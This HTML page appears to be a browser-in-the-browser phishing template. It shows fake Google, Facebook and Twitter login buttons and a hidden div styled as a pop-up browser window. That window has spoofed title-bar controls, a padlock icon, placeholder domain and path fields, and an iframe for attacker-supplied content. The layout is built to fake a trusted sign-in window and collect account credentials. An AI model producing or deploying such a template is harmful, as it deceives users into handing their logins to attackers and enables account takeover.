<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="stylesheet" href="Windows-DarkMode-Delay/style.css">
	<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
	<style>
		body {
			width: 100%;
			max-width: 100vw;
			height: 100vh;
			overflow: hidden;
		}

		.container {
			width: 100%;
			height: 100%;
			display: flex;
			flex-direction: column;
			justify-content: center;
			align-items: center;
			gap: 1rem;
		}

		.social_btn {
			width: 100%;
			max-width: 250px;
			padding: 1rem 2rem;
			display: flex;
			justify-content: center;
			align-items: center;
			cursor: pointer;
			background: #3C5A98;
			border: none;
			outline: none;
			color: #fff;
			font-size: 1rem;
			gap: 1rem;
			transition: background 0.2s ease-in-out;
		}

		.social_btn:hover {
			background: #324e86;
		}

		.social_btn.google {
			background: #DD4931;
		}

		.social_btn.google:hover {
			background: #c33e2a;
		}

		.social_btn.twitter {
			background: #32A6D8;
		}

		.social_btn.twitter:hover {
			background: #2891bd;
		}

		.social_btn svg {
			width: 1.15rem;
			height: 1.15rem;
		}

		.social_btn svg path {
			fill: #fff;
		}
	</style>
</head>
<body>
<div class="container">
	{{!-- google --}}
	<button class="social_btn google" id="clickme2">
		<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 488 512">
			<path d="M488 261.8C488 403.3 391.1 504 248 504 110.8 504 0 393.2 0 256S110.8 8 248 8c66.8 0 123 24.5 166.3 64.9l-67.5 64.9C258.5 52.6 94.3 116.6 94.3 256c0 86.5 69.1 156.6 153.7 156.6 98.2 0 135-70.4 140.8-106.9H248v-85.3h236.1c2.3 12.7 3.9 24.9 3.9 41.4z"/>
		</svg>
		Login with Google
	</button>
	{{!-- facebook --}}
	<button class="social_btn" id="clickme1">
		<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 320 512">
			<path d="M279.14 288l14.22-92.66h-88.91v-60.13c0-25.35 12.42-50.06 52.24-50.06h40.42V6.26S260.43 0 225.36 0c-73.22 0-121.08 44.38-121.08 124.72v70.62H22.89V288h81.39v224h100.17V288z"/>
		</svg>
		Login with Facebook  
	</button>
	{{!-- twitter --}}
	<button class="social_btn twitter" id="clickme">
		<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512">
			<path d="M459.37 151.716c.325 4.548.325 9.097.325 13.645 0 138.72-105.583 298.558-298.558 298.558-59.452 0-114.68-17.219-161.137-47.106 8.447.974 16.568 1.299 25.34 1.299 49.055 0 94.213-16.568 130.274-44.832-46.132-.975-84.792-31.188-98.112-72.772 6.498.974 12.995 1.624 19.818 1.624 9.421 0 18.843-1.3 27.614-3.573-48.081-9.747-84.143-51.98-84.143-102.985v-1.299c13.969 7.797 30.214 12.67 47.431 13.319-28.264-18.843-46.781-51.005-46.781-87.391 0-19.492 5.197-37.36 14.294-52.954 51.655 63.675 129.3 105.258 216.365 109.807-1.624-7.797-2.599-15.918-2.599-24.04 0-57.828 46.782-104.934 104.934-104.934 30.213 0 57.502 12.67 76.67 33.137 23.715-4.548 46.456-13.32 66.599-25.34-7.798 24.366-24.366 44.833-46.132 57.827 21.117-2.273 41.584-8.122 60.426-16.243-14.292 20.791-32.161 39.308-52.628 54.253z"/>
		</svg>
		Login with Twitter 
	</button>
</div>
<div id="window" style="margin:auto; background: #fff; position: fixed; top: 50%; left: 50%; height: 90vh; z-index: 3; transform: translate(-50%, -50%); display: none;">
<!-- Title bar start -->

<div id="title-bar-width">
	<div id="title-bar">
		<div style="margin-top:5px;">
			<img src="Windows-DarkMode-Delay/logo.svg" width="20px" height="15px" id="logo">
			<span id="logo-description">XX-TITLE-XX</span>
		</div>

		<div>
			<span id="minimize">&#8212;</span>
			<span id="square">□</span>
			<span id="exit">✕</span>
		</div>
	</div>
	<div id="url-bar">
		<img src="Windows-DarkMode-Delay/ssl.svg" width="20px" height="20px" id="ssl-padlock">
		<span id="domain-name">XX-DOMAIN-NAME-XX</span>
		<span id="domain-path">XX-DOMAIN-PATH-XX</span>
	</div>
</div>
<!-- Content start -->
<iframe id="content" src="" frameBorder="0"></iframe>
</div>

<!-- Content start -->

</div>
</body>
<script src="Windows-DarkMode-Delay/script.js"></script>
</html>

